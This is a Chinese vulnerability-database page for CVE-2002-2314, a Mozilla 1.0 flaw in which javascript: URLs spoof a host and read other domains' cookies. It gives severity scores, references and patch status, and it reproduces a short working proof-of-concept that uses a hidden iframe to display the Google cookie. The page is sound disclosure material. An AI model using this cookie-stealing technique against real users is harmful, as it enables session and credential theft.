CVE-2002-2314
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:54
NMCOE    

[原文]Mozilla 1.0 allows remote attackers to steal cookies from other domains via a javascript: URL with a leading "//" and ending in a newline, which causes the host/path check to fail.


[CNNVD]Mozilla JavaScript URL主机骗取任意Cookie访问漏洞(CNNVD-200212-365)

        Mozilla 1.0存在漏洞。远程攻击者可以借助开头为“//”结尾为换行符的javascript:URL从域名窃取cookies,该漏洞可能导致host/path检验失败。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2314
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2314
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-365
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/9656.php
(PATCH)  XF  mozilla-javascript-steal-cookies(9656)
http://www.securityfocus.com/bid/5293
(UNKNOWN)  BID  5293
http://www.mozilla.org/releases/mozilla1.0.1/security-fixes-1.0.1.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/releases/mozilla1.0.1/security-fixes-1.0.1.html
http://seclists.org/bugtraq/2002/Jul/0260.html
(UNKNOWN)  BUGTRAQ  20020724 Mozilla cookie stealing - Sandblad advisory #9
http://cert.uni-stuttgart.de/archive/bugtraq/2002/09/msg00230.html
(UNKNOWN)  BUGTRAQ  20020918 Mozilla vulnerabilities, an update
http://bugzilla.mozilla.org/show_bug.cgi?id=152725
(UNKNOWN)  MISC  http://bugzilla.mozilla.org/show_bug.cgi?id=152725

- 漏洞信息

Mozilla JavaScript URL主机骗取任意Cookie访问漏洞
中危 访问验证错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        Mozilla 1.0存在漏洞。远程攻击者可以借助开头为“//”结尾为换行符的javascript:URL从域名窃取cookies,该漏洞可能导致host/path检验失败。

- 公告与补丁

        This issue is resolved in Mozilla Browser 1.1. Users are urged to upgrade to the newest version of Mozilla.
        Mozilla Browser 0.9.2
        
        Mozilla Browser 0.9.2 .1
        
        Mozilla Browser 0.9.3
        
        Mozilla Browser 0.9.4
        
        Mozilla Browser 0.9.4 .1
        
        Mozilla Browser 0.9.5
        
        Mozilla Browser 0.9.6
        
        Mozilla Browser 0.9.7
        
        Mozilla Browser 0.9.8
        
        Mozilla Browser 0.9.9
        
        Mozilla Browser 1.0 RC2
        
        Mozilla Browser 1.0
        
        Mozilla Browser 1.0 RC1
        

- 漏洞信息 (21638)

Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability (EDBID:21638)
multiple remote
2002-07-24 Verified
0 Andreas Sandblad
N/A [点击下载]
source: http://www.securityfocus.com/bid/5293/info


Mozilla is an open source web browser available for a number of platforms, including Microsoft Windows and Linux. An issue has been reported in the Mozilla web browser which may allow script code to access cookie data associated with arbitrary domains.

It has been reported possible to create a javascript: URL which appears to start with a valid domain. Malicious script code may specify an arbitrary domain, and will be able to access cookie data associated with that domain.

Exploitation of this vulnerability may result in a remote attacker gaining access to sensitive cookie data, including authentication credentials.

<pre>
Title: Mozilla cookie stealing/spoofing
Date: [2002-07-24]
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>

<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
f.location = "javascript://www.google.com/\n"+
"'<body onload=alert(document.cookie)>'";
}
</script>		

- 漏洞信息

60255
Mozilla Crafted Javascript URI Cross-domain Cookie Disclosure
Remote / Network Access, Context Dependent Information Disclosure
Loss of Confidentiality
Vendor Verified

- 漏洞描述

- 时间线

2002-07-24 Unknow
2002-07-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站